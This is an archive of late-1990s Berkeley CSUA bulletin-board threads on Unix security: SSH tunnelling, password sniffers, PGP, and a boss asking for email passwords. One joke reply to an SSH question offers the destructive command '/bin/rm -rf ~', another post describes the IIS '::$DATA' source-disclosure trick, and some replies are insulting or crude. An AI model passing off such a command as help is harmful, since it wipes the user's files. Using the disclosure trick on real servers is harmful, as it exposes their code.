                I am not root. So I have trouble extracting from the archived
                file. Could anyone please suggest a solution? Thanks!
                \_ give more details (do you have root access on this new
                   machine? what error msgs are you getting? why are you
                   trying to archive starting at the root directory and
                   untaring it to another machine.  From the info you put
                   above no one can help you and will only make fun of you
                   like the cock sucker below.
                \_ You don't have to be root to untar the damn file.
                   untar it somewhere else.  Wanting to write to the
                   root directory w/o root access is NOT a tar question.
                   But it makes sense that you don't have root access.
                   People w/o a clue shouldn't have root access.
                   \_ He's asking how to untar it somewhere else, you idiot.
                      \_ No, you moron.  He meant root directory on a
                         different system.
1998/8/26-27 [Computer/SW/Security] UID:14510 Activity:kinda low
8/26    How do you get fetchmailrc to retrieve mail from uclink4 using
        ssh?
        \_ how's about "ssh uclink4 -L 9660:uclink4:110 -f" then have fetchmail
           POP to port 9660. -nick
                \_ You're tool cool.
           \_ If you don't do "-L 9660:localhost:110" then you're traffic
              will still go out on the local uclink4 network unencrypted.
                                                                -randal
1998/8/23-25 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:14498 Activity:nil
8/22    The Commission on Campus Computing report is now public.
        You can see it at http://ls.berkeley.edu/coc/report.html.
        Salient points (these are all recommendations--they have not
        been and may not be approved by the Chancellors):
        * Computer ownership should be required for new students starting in
          2000.
          \_ not everyone can afford a computer.
                \_ This is becoming less and less true.  (Read the report.)
                \_ If a computer is made a requirement, students can make it
                   part of their financial aid package.  -tom
        * Network connections should include a monthly charge starting in 1999.
        * All courses should have at least a skeletal web page.
        * All students should have a single account which includes
          disk space and Web access and which stays with them for the
          duration of their time at Cal.
        * IS&T should be moved under Carol Christ, and a new head of
          "Educational Technology" should be created.
                                                -tom
1998/8/21-22 [Computer/SW/Security] UID:14493 Activity:very high
8/21    My supervisor asked that everyone in the office release their
        e-mail password to her.  I don't feel comfortable doing that, and
        was wondering if there is some sort of UCB e-mail policy about
        not releasing passwords that I can quote in response to her request.
        \_ Your boss has no right to require that you give them your
           password.  root has the right to have full access to your
           account but that's a different story.  Don't do it.  Tell him
           shoove it up his ass if he forces you to.
                \_ root has the ability, but not necessarily the right, to
                   full access to your account.  (If at a UC or ISP, root
                   is prohibited from reading your e-mail for instance.)
        \_ Just say "NO WAY IN HELL"
           \_ You are F..I..R..E..D!!!! (do I smell million dallar law
              suit?)
        \_ Is it your personal email account or work account?  Either one,
           you have to right to not to.  You should ask her her reason for
           knowing password.
                \_ It is my csua account which I also use for work.  What
                   I am looking for is some sort of csua or ucop rule that
                   says I am not obligated to give her my password.
                        \_ CSUA policy forbids you from allowing anyone
                           else to have your password or use your account.
                           If she wants a password to your work e-mail,
                           make her give you a work e-mail account. --root
                           \_ in fact CSUA root will turn your account off
                              should we find that this is the case. --jon
        \_ Employers have a legal right to access to your office workstation
           and business related accounts.  That does not extend outside the
           office.  Forward your mail outside and tell her to shove it.
           If they forbid you from forwarding your mail outside the company,
           be very careful what email you do with your business address.  BIG
                      UC Policies. --jon
           BOSS is WAtching YOU. -ERic
                \_ But the UC/UCB e-mail policy protects the privacy of
                   UC employee e-mail - see
                        http://socrates.berkeley.edu:7015/policy
                        \_ Your *e-mail* is protected, but your *password* is
                           not.  In fact there is a campus policy that
                           your supervisor *must* have all the passwords you
                           use for business purposes (if you're UC staff).
                           They just can't look at it except under the
                           situations outlined in the e-mail and other
                           policies.  -tom
                           \_ No, root never knows what your passwords
                              are. Having passwords stored anywhere on a
                              computer comprimises security.  Passwords on
                              /etc/passwd or /etc/shadow are one way
                              encrypted so there's no way to derive
                              the original passwords without a password
                              cracker and a high performance computer.
                                                \_ A 386 is powerful enough
                                                   to crack many passwords.
                                \_ I didn't say root, I said "your
                                   supervisor".  -tom
                   \_ Boy imagine that, UC managers who do not understand
                      or are not aware of UC Policies. --jon
                      btw, if you want a wider discussion, there is also
                      http://ucb.net.discussion.  I am sure some of the more
                      security minded denizens of that newsgroup will have
                      some interesting opinions on this topic.
                  \_ Well its nie the the UC at least grants some expectation
                      of privacy to employee email.  I'm just pointing out that
                      in the 'real world' of employment, it can be very
                      different. -ERic
        \_ I think she likes you!
          \_ I think so too!!
                \_ She's married and I'm a girl.  Hence, I don't think so.
                        \_ She could be bisexual.
                        \_ How about giving me your password.  I am not married
                           and I am a guy and not gay.
                  \_ which company is this?
1998/7/30 [Computer/SW/Unix, Computer/SW/Security] UID:14416 Activity:very high
7/30    Where the heck is kchang? I need my daily dose of idiocy.
        \_ WHITEY GO HOME
        \_ Oh my god, they killed kchang!  You bastards root!
           \_ Is that what /csua/adm/bin/sorry means?
           \_ Yes...I killed him cuz I was on his watch list.  My
              accomplice helped me cuz he was not on his watch list.
              \_ Sorrying kchang is morally equivalent to slavery and
                 discrimination against the black man!  Just because you
                 lily-white root bastards no longer keep black people in
                 chains and let millions of mexicans across the border every
                 day, you think "nobody can see us discriminating in all these
                 other ways in which we used to discriminate . . . so its okay
                 to sorry kchang because were are being so good and nobody
                 will notice!!!!!!!"  You are wrong!!!!!  I WILL NOTICE!!!!!!
                 \_ I didn't write this; I don't endulge myself in the
                    gratuitous use of exclamation points -(fucker)
                    \_ In this context, the use of additional exclamation
                       points is quite correct.  It emphasizes the mental
                       anguish and suffering of an AGGRIEVED MINORITY!!!!!!
                       WHITEY (root) WILL PAY!!!
        \_ kchang left soda to devote his full attentions to a career in the
           bath-house management industry.
           \_ i.e. he went to take a shower?
        \_ you guys are too sarcastic.
1998/7/29 [Computer/SW/Security] UID:14409 Activity:nil
7/27    Does anyone know why there are two different versions of pgp on
        instructional machines?  There seems to be the version where
        everything is done through the single pgp command and the other
        version that's split up into pgps, pgpe, pgpk, etc..
        \_ PGP 2.6 (as well as 2.3) == pgp
           PGP 5 == pgps, pgpe, pgpk
           \_ where do you get this pgp 5? I thought csua's ftp site was
              supposed to contain the most up-to-date version but they
              only seem to go up to 2.6 (/ftp/pub/cypherpunks/pgp/)
                \_ it's commercialwarez
                   \_ source is still available although many people think
                      PGP is selling out.  Get it from http://www.pgpi.org
                      worldwide, e.g.  cypherpunks FTP is NOT maintained now.
        \_ SWW on the HP's & DEC's is run by the dept. and is stagnant due
                to lack of employees to maintain it.  SWW on the Solaris x86
                machines is maintained by root@cory and is much more up to
                date (making it wildly inconsistent with the other machines).
        \_ Ahh, but I am pushing the sww people to get there stuff more current.
           First on the plate is emacs then a bunch of the gnu utilities. --marc
           \_ Good luck! There simply aren't enough people and PGP sure as hell
              isn't a high priority.  Push all you like.  Into /dev/null.
              Don't waste your time trying to get SWW to do anything, just
              build your own.  -been there, done that
1998/7/27-29 [Computer/SW/Security, Computer/SW/Unix] UID:14400 Activity:high
7/27    One of the instructional computers was found cracked and was
        possibly running a sniffer. Since the machine in question was
        on the 43 net, soda accounts might have been compr[o]mised.
        \_ are there political problems w/ turning off rsh telnet and
          so on (in favor of ssh)
          \_ Is that a pretty elitist point of view?  Maybe we should just
             leave rsh/telnet enabled, but force them to use a one-time-use
             password scheme.
          \_ lots of people don't access to ssh.
          \_ lots of people don't [have] access to ssh.
          \_ SSH does not work well with some corporate firewalls
          \_ A more 3l33t plan would be to unplug soda's net connection, and
             have all interaction with the machine be via hardwired TVI 920
             terminals.  All the terminals would be in the same room as soda
             (to make sure that hackurs from the outside don't splice their
             way into the wiring), and that room would be TEMPEST shielded.
             \_ and what would we use soda for it it had no net connection?
        \_ Don't use telnet.  Don't use telnet.  Don't use telnet.
           (I have said it thrice; what I tell you three times is true.)
                \_...or ftp, or pop3...
           \_ Kerberized telnet?  telnet -x otherhost
                \_ not to soda
           \_ sometimes we have to connect to soda from devices that don't
              support anything BUT telnet. Like routers and access servers.
              We need one-time-passwords  on telnetd. -ERic
        \_ but was the snark a boojum?
           \_ The snark WAS a boojum, you see.
                \_ If your firewall is lame-ass (i.e. run by BBN because
                   some marketroid thought it would be a good idea) and
                   you are forced to use telnet, do what you can to set up
                   one-time passwords via s/key.  There is a free WinBlows
                   one-time password computer available out there (I got
                    my copy from somewhere on <DEAD>ftp.msri.org<DEAD>) and if you want
                   to port it to another UNIX then we have source here on
                   soda.  Doesn't solve all problems, but at least prevents
                   scriptkiddies from grabbing your real password.
                   rtfm on skey(1) for more info.  -- tmonroe
                   \_ Might want to check out OPIE instead of S/Key. --dim
                      \_ urlP
                         \_ ftp://ftp.nrl.navy.mil/pub/security/opie or
                            ftp://ftp.inner.net/pub/opie  --dim
                   \_ One-time passwords are somewhat limited compared to
                      SSH, though, since they don't typically encrypt the
                      contents of your session (thus preventing you from
                      safely typing other passwords from within telnet).
                      Better than nothing, though.
                      \_ The point was not everyone can use ssh.
                      \_ ssh is also much better than telnet for dealing
                         with flaky connections that drop a lot of packets
                         for extended periods of time, if you don't want
                         to lose link.  For some reason.  Can someone
                         explain this?  I'm curious.  -John
                         \_ TCP_KEEPALIVES-- telnet uses them, ssh doesn't.
                            odd that the SO_KEEPALIVE would cause to lose
                            connections in a lossy network, but thats how
                            it works. -ERic
        \_ Since the 43-net runs through public access labs that anyone can
           bring their laptop into and start sniffing, always assume packets
           to soda are being sniffed.
           \_ Why isn't access at the public access labs run on switches?
              Is there a reason to expose the communications "backbone"?
                \_ What's the notation for "current PID" in most shells and
                   Perl?  There's your answer.
                        \_ Geek.  Just say $$.  Sheesh.  Had to be "clever"?
                \_ Switches cost money - the dept's just barely finishing
                    converting Cory Hall - Soda Hall is scheduled to be
                    converted as soon as they figure out who's paying for it.
                    \_ the cost difference between switched and shared is
                        negligible these days.  -tom
                        \_ But they already have shared and already paid.
                           Also, maybe they want to wait for Fast Ethernet?
                \_ Because the university by its nature is always behind.
1998/7/25-26 [Computer/SW/Security, Computer/SW/Unix] UID:14393 Activity:nil
7/24    What is the best way to do encrypted FTP? I'd like to do the data
        stream, but I'd settle for the command channel. Anonymous FTP would
        be nice, too. SSL is the only method I've investigated. Ideas? --dim
        \_ SSH port forwarding for this is pretty standard; you might need to
           use passive FTP.  Datafellows is also coming out with an FTP client
           with built-in SSH soon, they say.  If you don't need interactive
           capability, SCP is far better. -- schoen
           \_ Already using SCP, but have need for FTP. Port forwarding as
              described in the SSH FAQ is not an option. I need a more
              transparent solution. Thanks. --dim

   /- Whoa, news from the future!
1998/7/14 [Computer/SW/Security] UID:14328 Activity:high
7/13    http://www.distributed.net/des crack the Data Encryption Standard
        using idle time on your computer, prove it's inadequate.
        \_ get a life.
           \_ Oh SURE . . . you say that now, but wait until 3:30 AM on that
              fine Sunday morning, when the black helicopters hover over your
              house, and the black ropes come out, and zombie Nazi mind-slaves
              (vat-grown by the UN) wearing black body armor rappel down them
              to burst through your front door and kill you and the wife and
              little Timmy, ALL BECAUSE THAT E-MAIL TO GRANDMA FLO AND
              GRANDPA MEL ABOUT LITTLE TIMMY'S SOCCER GAME LAST WEDNESDAY
              used WEAK DES ENCRYPTION . . . don't expect me to cry for you
              _then_.  Bastard.
                \_ We don't work on Sundays.  -Black Mask Man
           \_ Why do you not like announcements of techie stuff?  This IS the
              "Computer Science" Undergraduate Association, is it not?
                \_ "using idle time on your computer [soda]"....
                        \_ soda is not your computer
                                \_ soda is our computer.  keep this stupid
                                   crap off.
                                   crap off.  It's already well known that
                                   DES is inadequate.  It's been proved.
                                   This is nothing more than a GeekEgo thing.
                   \_ Don't do that, then.
           \_ Think of it this way.  You get $$$ if you personally break
              it.  Of course, people who do CS only for that reason
              deserve to be shot.
              \_ That's not CS, it's CE.
                \_ It's not even CE.  It's running a black-box program on your
                   computer.
              \_ There are other reasons to do it money: curiosity, politics.
        \_ Is there a Cal team this time?  -- yuen
           \_ Not unless I hear a lot of interest or unless the RC5 teams carry
              over.  Or ask Trey (rhyde@uclink4) if he wants to take it over
              again.  This contest is supposed to end in 9 days; it's not worth
              doing a lot of organizational work for something that's gone a
              week after you start. -- schoen, inheritor of UCB RC5 team contact
1998/7/2-3 [Computer/SW/Security, Computer/SW/Languages/Web] UID:14289 Activity:nil
7/2     Microsoft security flaw. "::$DATA" behind any asp code will
         allow you to read source code.
        \_ So?  What about Microsoft isn't a security flaw?
1998/6/18-23 [Computer/SW/Security] UID:14223 Activity:nil
6/18    http://www.fbi.gov/foipa/ufo.htm -- the truth is out there...
        \_ http://home.att.net/~ixlez/inexufo1a.htm
1998/6/12-16 [Computer/SW/Security] UID:14208 Activity:kinda low
6/11    ssh 1.2.25 installed, to fix the crc checking security hole.
        The update broke hushlogin support; I hacked sshd to fix the
        problem for now (~mconst/pub/ssh/sshd-hushlogin-patch), and
        I'm sending a bug report out soon.  Let me know if anything
        else goes wrong.  --mconst
        \_ so *why* is the patch ifdef'd for only __FreeBSD__ when it looks
           like there's nothing OS dependent in it?? -ERic
           \_ My patch doesn't mention FreeBSD, it was already there -- the
              ssh-1.2.25 login_cap code is all in #ifdef __FreeBSD__ blocks.
              What broke is that under FreeBSD, sshd would ignore .hushlogin
              The problem was that under FreeBSD, sshd would ignore .hushlogin
              files and just look at login.conf.
1998/6/4-8 [Computer/SW/Database, Computer/SW/Security, Computer/SW/Languages/Web] UID:14175 Activity:moderate
6/4     Anyone have experience with http://best.com as web host provider? Good?
        Bad? Comparable alternatives?
        \_ Good.  No comparable alternatives.  -tom
        \_<DEAD>www.best.com/boxes/~indian<DEAD>
        \_ Best experience i've ever had with a web provider. They
                provide competent and beyond-the-call-of-duty technical
                support, FAQs, etc. -appel
                http://www.chaosium.com
                http://www.glorantha.com
           \_ I'm using it for two of my web sites (http://www.theil.com and
              http://www.docmisha.com and would definitely recommend it to
              other folks.  Haven't had such a good experience with their
              tech support though.   -genie
           \_ I plan on having several CGI scripts. They list a 1000cgi
              seconds/day. I highly doubt I'll reach that limit, but just
              so I have a reference, what type of program with how many
              uses per day would come close to hitting that quota?
                \_ run your CGI with "time foo.cgi" to see the amount of
                   CPU time it takes.  It's basically a non-issue unless
                   you're grabbing nude pictures out of a database. -tom
                   \_ Though wall-clock time on your system and wall-clock
                      time on their system may be rather different.
                      Is it an issue if you're grabbing pictures of clothed
                      people from a DB? :-)
                      \_ You're not charged for wall-clock time, you're charged
                         for CPU time.  They run boxes very similar to soda,
                         so CPU time here should be comparable.  It is unlikely
                         that you'll get enough hits to matter if you're
                         grabbing pictures of clothed people from a db.  -tom
1998/6/4-11 [Computer/SW/Security] UID:14171 Activity:nil 66%like:14387
6/3     ssh-1.2.23 installed, bugs to mconst.
1998/5/21 [Computer/SW/Security] UID:14119 Activity:very high
5/10    How does the root know what the sniffer logged??!?!?
 Hi.  You are receiving this automated note because of a breakin to one
 of our machines.  The intruder installed a sniffer and began logging
 passwords.

 Your password appeared in those logs.

 Therefore, you should change your password immediately.  (If you use
                                                        \_ and use SSH
 the same password on several machines, don't forget to change it on all
 of them!)
        \_ Because the sniffer logged to disk and root can read the disk.
                DUH!
        \_ Because the sniffer E-mailed the passwords to somebody else, and
           root happened to run across the list one day when they were
           reading everybody's E-mail looking for interesting stuff, silly.
        \_ Because you logged in during the period of time the sniffer was
           active.  It's a good guess that your password was sniffed during
           that time.
        \_ "Appeared in" --> "we have a copy of, and we read".  Not telepathy.
        \_ so why the love affair with ssh? besides telnet,
           aren't the pop3 and ftp ports also vulnerable?
                \_ that's like asking "why the love affair with helmets?
                   aren't other body parts still vulnerable?" - protecting
                   the most important/used parts is better than going
                   completely unprotected
           \_ Yes, of course.  That's why SSH supports port redirection, so
              that you can securely use unencrypted services.  See the man
              page for ssh, options "-L" and "-R".  SSH is more than just a
              telnet replacement...
           \_ Don't use pop3 and use scp where you'd use ftp (although ssh
              can encrypt ftp's authentication). --dim
                \_ Huh?
                   \_ What's so hard about "don't use pop" or "use scp instead
                        of ftp"?
        \_ It's super cool sysadmin magic.
        \_ cuz root *is* the sniffer!
          \_ no, root is the Kwisatz Haderach.
1998/5/12-13 [Computer/SW/Unix, Computer/SW/Security, Academia/Berkeley/CSUA] UID:14090 Activity:low
5/12    As long as all these new jobs are getting announced in /csua/pub/jobs,
        a small request for people to please CLEAN OUT all the old jobs that
        are no longer relevant.  A number of postings there are owned by root
        because they were moved around.  Those responsible for them, please
        let me know if they are still relevant or can be deleted.       -lila
        \_ Princess Lila made a demand!  All must comply.
          \_ "small request".
          \_ Ohhh. Ahh.
1998/5/6 [Computer/SW/Security, Computer/SW/Unix] UID:14055 Activity:low
5/5     From the MOTD on http://socrates.berkeley.edu:
        >On June 1, 1998 Communication and Network Services (CNS) will be
        >enhancing the Web access to the Campus Directories. At that time,
        >we will discontinue platform-specific Directory Services, such as
        >Unix fspb and Macintosh HyperPB, and gopher and telnet access to
        >Infocal.  This will not affect telnet/host presenter access to
        >Socrates,
        >
        >If you have any questions, please send e-mail
        >to cpadmin@profile.berkeley.edu.
         \_Who cares?
           \_ _I_ care, dammit.  Platform-specific directory users,
              I feel your pain . . .
1998/4/17-18 [Computer/SW/Security, Computer/SW/Unix] UID:13980 Activity:high
4/17    If I want to use ssh to connect to a remote machine and run xwin
        apps, what is the command line to start, say, xterm.  And what do I
        need to set up beforehand?  -emarkp
        \_ unix: /bin/rm -rf ~
           windoze: fdisk
           mac: drag all your icons to the trash can.  empty trash can.
           \_ Um, I assume this is a comment about the security?  I though
              ssh was a secure way to transmit x-events.  Furthermore, this
              does not answer the question.  -emarkp
              \_ someone buy this man a clue
        \_  with a properly configured ssh, its all hidden 'silently' from
            you.  ssh to the remote host and run your x commands normally
            SSH 'silently' sets your DISPLAY environment correctly for you,
            and your shell commands will inherit it. -ERic
            \_ Where can I go to find docs to do the setup correctly?  Or
               is it simple enough to post here?  -emarkp
               \_ Have you actually tried to run xterm already?  If it
                  didn't work, maybe you want to give the error mesg
                  encountered.
                \_ The freeware 1.22 unix package had plenty of docs. RTFM.
                   It isn't that hard.
            \_ well the  'default setup' works 'correctly'.  If you have an
               idiot sysadmin who changed the defaults and put in things like
               disabling xforwarding in sshd config, then it won't work. -ERic
1998/4/14 [Computer/SW/Security, Computer/SW/OS/Windows] UID:13950 Activity:high
4/14   What's with the login uname? MS-DOS V3.3 ? Is this joke going to
       last forever?
       \_ It's no joke.  We've secretly replaced soda with an MS-DOS machine
          (with Microsoft DOS/Connect for networking) and we were hoping no
          one would notice -- but damn it, you've spoiled everything.  --root
          \_ MS-D0S???/?  1 CAN RUN K1NG"Z QU3ST 0N 1T!!!!1!!!
             BUT H0W DU 1 S3ND TH3 P1CTURZ 2 MY SKR33N??????  H3LP!!!1!
          \_ alias ver 'uname -a'
        \_ some perpetual April's Fools Joke
        \_ The best one so far, IMHO            -muchandr
        \_ The joke's still there.  jon@csua attaching his name as if
           he has done anything.
1998/4/2 [Computer/SW/Security] UID:13893 Activity:nil
4/1     What is the difference between a segmentation fault and a bus error?
        \_ segmentation is an address fault. you have attempted to access
           an invalid address or one you do not have permission to access.
           bus error is usually an aligment violation. attempting to access
           an int on a non-word boundary, for example. --aaron
           \_ But why is it called bus error?  not alignment error?
                \_ It goes back to the days when Muni's schedule system was
                   computerised.  Due to boundary/alignment errors, they were
                   sending all the busses on the same route at the same time.
                   Thus, the bus error was created.
1998/3/22-23 [Computer/SW/Security] UID:13849 Activity:high
3/21    Ron Rivest is at it again: he's invented a technique to achieve
        message confidentiality with hash functions and no encryption,
        simple, intuitive, and completely non-export-controlled.
        http://theory.lcs.mit.edu/~rivest/chaffing.txt
        \_ note that he's just rephrased steganography to have a more dynamic
           method of mixing the message bits into another data stream, and he
           relies on message authentication to reject the superfluous data.
           old mechanical crypto systems in the 60s did stuff like that
           but filtered by using the same psuedo-random sequence as the
           sender. Rivest's method will require a good random generator at
           the sender (to permute packet order for the chaff). it will
           \_ why do you think that?  my reading of his text didn't imply
              any packet order changes, just one or more chaff mesgs per
              valid packet.  please mail me --oj
              \_ The packets go out in the same order, but you have to send
                 chaff too, and the chaff has to be in an unpredictable
                 order with respect to the wheat.  If you always do
                 wheat1-chaff1-chaff1 wheat2-chaff2-chaff2 wheat3-chaff3-chaff3
                 it's not hard to figure out where the wheat is.
           also probably make everybody's exportable authentication code
           get reclassified as munitions, now that someone's pointed out
           how it "really is encryption" (the way regulators think). --karlcz
           p.s. he also requires that the secret authentication key get
           transported by some other secure means (public-key encryption
           for those of us without exploding-attache-case couriers ;-).
        \_ I'm not too terribly impressed.  As karlcz pointed out there's
           still this secret-key business thats required to create valid MACs
           and I'm not really psyched about the typical CSUA idiot adding
           300 chaff packets per wheat packet to keep their email and porn
           URLs secret from "Them".  The net is slogged enough as it is.
           What really needs to happen is to drop the ridiculous export
           controls.  If I'm a terrorist or in the mafia, I _am_ going to
           \_ That was exactly Rivest's point, though.  Obviously a block
              cipher is much more effective than chaffing, but it's currently
              in a very different political position.  But Rivest's own
              conclusion is: "Mandating government access to all communications
              is not a viable alternative.  The cryptography debate should
              proceed by mutual education and voluntary actions only."  That
              goes for international controls as well as domestic.
           use the best possible encryption for all communications, and
           be damned the US law.  Hello, duh, a terrorist or high powered
           mafioso is already going away for life.  Going to add 3 months
           of consecutive time for an encryption export violation?!?
           \_ you miss the point.  If encryption were export legal, then it'd
              be easy to market via consumer channels.  Once that happens,
              you can pretty much kiss good-bye law enforcement's ability to
              wire-tap even the petty criminals.
              \_ So the point wasn't to make a decent and reasonable secure
                 communications method, but was simply to snub law enforcement
                 with a hacked end run?
                 \_ Yeah, kinda looks that way.
1998/2/17-18 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13682 Activity:high
02/16   In Apache, when I use .htaccess, how do I "log-off" from a browser?
        Thanks.
        \_ You're not "logged on" in the first place; http connections are
           stateless.  If the browser decides to store the username and
           password, that's the browser's business.
                \_ Okay then, how do I make the browser not use the username
                   and password during HTTP transaction then?
                        \_ Restart the browser or get one that lets you
                                clear stored passwords
                           \_ Restart-- you mean quit and start again? Sheesh
                                \_ Yep - sucks don't it?
                                \_ Yep.  Sucks don't it?
                        \_ It's totally browser-dependent.  Once Netscape
        /------------------/
        Once Netscape releases the source, expect the days to look like the
        80's when people have to deal with DOS 2.0/3.0/MSDOS/Windows 2.0/OS2
        Geoworks OS incompatibility, not mentioning incompatibilities between
        MSWord/WordPerfect/WordStar/AmiPro/Lotus/blah blah blah. Proliferation
        of many different warez means happiness and perhaps some creativity but
        it also means a lot of headache for the end users. Are the average
        American Joe sophisticated enough that they can handle so many
        different platforms with different HTML standards, plug-ins, c00l
        features, this and that, or they just want a simple burger that
        satisfies their stomach? What do the dumb average American Joes want?
                           releases the source you could make a "forget
                           passwords" button or something.
        \_ Seriously doubt Joe User is going to d/l a hacked up copy of NS
           from http://www.butchery.org  They're going to go to netscape, as always,
           and d/l the version made available by the NS people.  The NS
           version is going to be a "best-of-the-net" browser.  Or so says
        \_ Dronage deleted.  For your reference, it said:
        "\_ Next drone deletion means deletion of entire motd. Watch it u nazi."
           NS.
                \_ so?  what does this have to do with the above?
        "You have been warned"
           NS.
                \_ So?  What does this have to do with anything?
                  \_ It has to do with a large piece of text that was deleted.
1998/2/13-14 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13664 Activity:moderate
2/12   Last month, the Clinton Administration announced that it will spend
       $28 million to retrain workers, create an Internet jobs bazaar and try
       to convince kids that the computer sciences are cool. The p.-r.
       blitz will include public service videos starring Jimmy Smits,
       tough-guy star of the television cop show NYPD Blue.
        \_ Isn't CS61A full enough already?
          \_ Not enough potstickers to go around anymore?
        \_ Oh good.. flood the industry with idiots and marginalize all of us.
          \_ The CS61A undergraduate teaching assistant industry?
        \_ WONDERFUL. More Microsoft-like people writing more code, and now
           applications will crash way more than ever. I remember the good 'ol
           days of text applications with DOS and apps just don't crash the
           way they do now. Microsoft/Netscape are two fine examples.
1998/2/4-5 [Computer/SW/Security] UID:13623 Activity:high
2/4     I have an obsession to crack root to read people's emails.
        Is that normal?
                \_ yes
        \_ ask marco
        \_ How would you do it on shadowed systems?
                \_ The Shadow knows....
                \_ <DEAD>www.rootshell.com<DEAD>
        \_ Don't bother.  As a sysadmin who has had real work reasons to
           read mail files over the years, I can assure you that no one's
           mail is worth reading, much less the effort required to acquire
           the access to do so.
           \_ but you get some good jokes sometimes...
1998/2/2-3 [Computer/SW/Security] UID:13608 Activity:moderate
2/2     If you've experienced frequent lost of connection to soda it's
        because you turned on your wall (wallall y).  Try turn them off
        and tail the wall log instead (tail -f) and see if that improves
        the reliability for you.
        \_ Do you have any basis for this statement at all?
                \_ Trust me on this one.
        \_ So you're saying that wallall affects my packets not being able to
           get through some router btwn my ISP and UCB? Wow.
           \_ Yeah, didn't you read the CERT advisory of April 1, 1997,
              "wallall Denial of Service Attack"?
        \_ Wall is more than just a program; it is a way of life.
        \_ Beware The Wall.  We don't need no education.
1998/2/2-3 [Computer/SW/Security, Computer/SW/Languages/Misc, Computer/SW/Unix] UID:13607 Activity:high
2/1     What is the easiest way to allow people (actually myself) to upload
        stuff through my web page?  --- clueless
        \_ DON'T DO IT.
        \_ This may open you up to a lot of security risks; think carefully
           when you implement something.  How do you want to do it?  Do you
           want to enter text into a form and then have it available as a
           file in an account somewhere?
           \_ Don't listen to these idiots.  The easiest way is probably
              HTTP PUT; see the Apache documentation.
                \_ Oh really?  So where's a page you wrote that allows
                   uploads?  Post the URL so we can all have fun hacking it.
                   \_ Why don't you just tell us how to hack HTTP PUT.
                      \_ "There are few scripts available which implement PUT
                         handling securely." _Apache Week_, April 4 1997
                         In concept it _can_ be secure, but it's not an
                         unrealistic concern; frequently the PUT scripts
                         have holes, even more than other CGI stuff.
                         \_ PUT is fairly simple; it is not difficult to write
                            a secure PUT script.  You don't need "many"
                            scripts available which implement PUT securely,
                            you only need one.
                            \_ right, but first you've got to find it. :-)
                                \_ If you use suexec, it's not hard to
                                   write one.  Just make all paths relative
                                   to the document root and disallow ".."
                                   and other funky characters.
                \_ YES! suexec is much more secure! We really should run
                   httpd on soda instead of scotch so that one will not be
                   able to kill the "nobody" process arbitrarily.
                                   \_ I'm still waiting to see your secure
                                      page.  Post the URL when you're ready.
                   \_ Oh, give it up.
        \_ thanks for all your responses.  I wanted to do this as a way to
           replace ftp to transfer my manifestos:-).  The web server is going
           to be running only when I need to transfer file and is shut down
           the moment the transfer is done.  So I guess it does not need to
           be too secure.  Anyway, the question is now whether I will get
           enough clue to find out how to write a minimal script. -- clueless
           \_ You must be too sexy to use scp.
              \_  No, Jobs is too sexy to have scp developed for mac.
1998/1/21-22 [Computer/SW/Security] UID:13541 Activity:very high
1/21    ssh versions through 1.2.21 have security hole in ssh-agent - upgrade
        to 1.2.22 or stop using ssh agent until you do.
        \_ Uh oh... you mean people will be able to snoop my incredibly
           sensitive private email and see what porn I'm downloading?  Help!
           Help!  The sky is falling!
        \_ Any URL?
           \_ for the porn?
           \_ See:
              http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265 -dim
        \_ Once again, is there an URL confirming this?
           \_ http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265
           \_ Just read the freaking ssh 1.2.22 release notes or
                comp.security.ssh
1997/11/19 [Computer/SW/Security] UID:32164 Activity:nil
11/18   Has anyone had trouble getting xlock to work with shadow
        passwords?  How do I get around it not knowing where to look
        for the passwords?  Having it setuid does not work.  -John
        \_ Hmm, I managed to get version 4.01 to work with shadow
           passwds. Maksure that on top of making the binary setuid
           that the binary is owned by root. -- marc
        \_ /usr/openwin/bin/xlock works fine with shadow passwords.
1997/5/2-15 [Computer/SW/Security, Computer/SW/Unix] UID:32134 Activity:nil
4/25    Every new account on soda comes with a file called "FAQ".  (If
        you lost your copy, a fresh one is always available in
        /usr/local/csua/FAQ .)  Please read it and remember it when you
        have questions/problems.  Asking root questions that it answers
        is grounds for getting really snide or obnoxious responses from
        root, if your mail is answered at all.
1997/4/25 [Computer/SW/Security, Computer/SW/Unix] UID:32127 Activity:nil
4/17    If you ever have problems logging into soda, please check the
        http://ucb.org.csua newsgroup for announcements of system problems
        before mailing root.  If there is a system problem, mailing
        root just fills root's mail spool once it's fixed and too late
        to do anything about it.  This and other useful information
        was in the FAQ file in your account when it was created.
        Please read it and remember it - if you lost your copy, a
        fresh one is always available in /usr/local/csua/FAQ.
        Asking root questions that it answers is grounds for getting
        really snide or obnoxious responses from root.
1997/1/29 [Computer/SW/Security, Computer/SW/OS/Windows] UID:32049 Activity:nil
1/29    I bought a new HD, 4 gig, and I'd like to move everything from my
        old 1 gig to the 4 gig (4 gig = primary, 1 gig = secondary). Where
        can I find a good DOS backup utility that does this? Thanks.
        \_ DOS Tar's good
         \_ No, it doesn't do long name (8+ char), STUPID
        \_ what's wrong with copy /s d:\ c:\c_drive ?
1996/10/29 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:31974 Activity:nil
10/28   The San Francisco Book Festival's this weekend, if anyone's
        interested... it's generally lots of fun -- interesting authors, poets,
        book crafts, etc.  More information's at http://www.sfbook.org
        There's generally a nominal admission charge, unfortunately. --tabloyd
        \_ youll pay hundreds for dorky computer equipment which will be worth
           half its value in 6 months, but you complain about a "nominal"
             admissions charge to a book festival... :)
           \_You should hear me complain about computer equipment (which we
             hardly ever buy anyway!).  But I just thought people should be
             aware that there is an admission fee -- you also have to pay to
             buy any books, unlike at the ABA, where it's all free.  --tabloyd
              \_ fair enough! :)
1996/10/29 [Computer/SW/Security, Computer/SW/WWW/Server, Computer/SW/Unix] UID:31973 Activity:nil
10/28   Why aren't the web server logs mounted on soda? People do like
        to see who is accessing their web pages.
        \_ Try mailing root and asking them.  Most likely it's just something
           no one's bothered to do yet as part of the changeover.
        \_ I'll let you serve my logs baby
        \_ I wanna see who's accessing your web pages, too...
1996/10/28-11/4 [Computer/SW/Security] UID:31953 Activity:nil
10/24   IMPORTANT!   A sniffer was caught using one of the Cory Hall
        machines to get passwords to accounts on soda.  He sniffed net
        connections from the 240 subnet to soda and elsewhere.  Please
        change your password if there's any chance your account
        was compromised!
1996/6/5 [Computer/SW/Security, Computer/SW] UID:31849 Activity:nil
6/3  Anyone know how i can change my local address with Sproul over
